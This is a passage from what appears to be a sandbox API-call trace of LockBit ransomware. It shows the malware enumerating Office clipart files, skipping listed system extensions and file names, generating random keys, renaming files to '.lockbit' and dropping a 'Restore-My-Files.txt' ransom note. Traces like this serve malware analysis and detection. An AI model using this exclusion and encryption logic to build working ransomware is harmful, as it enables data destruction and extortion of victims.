(lpString1=".com", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.002] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.003] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.003] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107500.WMF") returned 1 [0142.004] lstrcmpiW (lpString1="ntldr", lpString2="J0107500.WMF") returned 1 [0142.004] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107500.WMF") returned 1 [0142.004] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107500.WMF") returned -1 [0142.004] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107500.WMF") returned -1 [0142.004] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107500.WMF") returned 1 [0142.004] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107500.WMF") returned -1 [0142.004] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.004] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned=".WMF" [0142.004] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.004] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.004] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.005] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.005] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.lockbit") returned 72 [0142.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.006] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.006] malloc (_Size=0x40068) returned 0x3ef0008 [0142.006] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=4200) returned 1 [0142.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0142.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0142.007] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0142.012] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.012] malloc (_Size=0xa6) returned 0x77d7a8 [0142.012] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.013] free (_Block=0x77d7a8) [0142.013] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.013] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.014] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.014] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a54, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107502.WMF", cAlternateFileName="")) returned 1 [0142.014] lstrcmpiW (lpString1=".", lpString2="J0107502.WMF") returned -1 [0142.014] lstrcmpiW (lpString1="..", lpString2="J0107502.WMF") returned -1 [0142.014] PathFindExtensionW (pszPath="J0107502.WMF") returned=".WMF" [0142.014] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.014] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.015] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.015] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107502.WMF") returned 1 [0142.016] lstrcmpiW (lpString1="ntldr", lpString2="J0107502.WMF") returned 1 [0142.016] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107502.WMF") returned 1 [0142.016] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107502.WMF") returned -1 [0142.016] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107502.WMF") returned -1 [0142.016] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107502.WMF") returned 1 [0142.016] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107502.WMF") returned -1 [0142.016] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.016] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned=".WMF" [0142.016] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.016] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.016] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.017] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.017] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.lockbit") returned 72 [0142.017] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.018] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.018] malloc (_Size=0x40068) returned 0x3df0008 [0142.018] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10836) returned 1 [0142.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.019] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0142.023] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.023] malloc (_Size=0xa6) returned 0x77d7a8 [0142.023] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.024] free (_Block=0x77d7a8) [0142.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.024] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.024] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107512.WMF", cAlternateFileName="")) returned 1 [0142.025] lstrcmpiW (lpString1=".", lpString2="J0107512.WMF") returned -1 [0142.025] lstrcmpiW (lpString1="..", lpString2="J0107512.WMF") returned -1 [0142.025] PathFindExtensionW (pszPath="J0107512.WMF") returned=".WMF" [0142.025] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.025] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.026] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.026] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107512.WMF") returned 1 [0142.026] lstrcmpiW (lpString1="ntldr", lpString2="J0107512.WMF") returned 1 [0142.026] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107512.WMF") returned 1 [0142.026] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107512.WMF") returned -1 [0142.026] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107512.WMF") returned -1 [0142.026] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107512.WMF") returned 1 [0142.026] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107512.WMF") returned -1 [0142.027] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.027] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned=".WMF" [0142.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.027] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.027] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.028] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.028] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.028] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.028] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.028] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.lockbit") returned 72 [0142.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.029] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.029] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.029] GetFileSizeEx 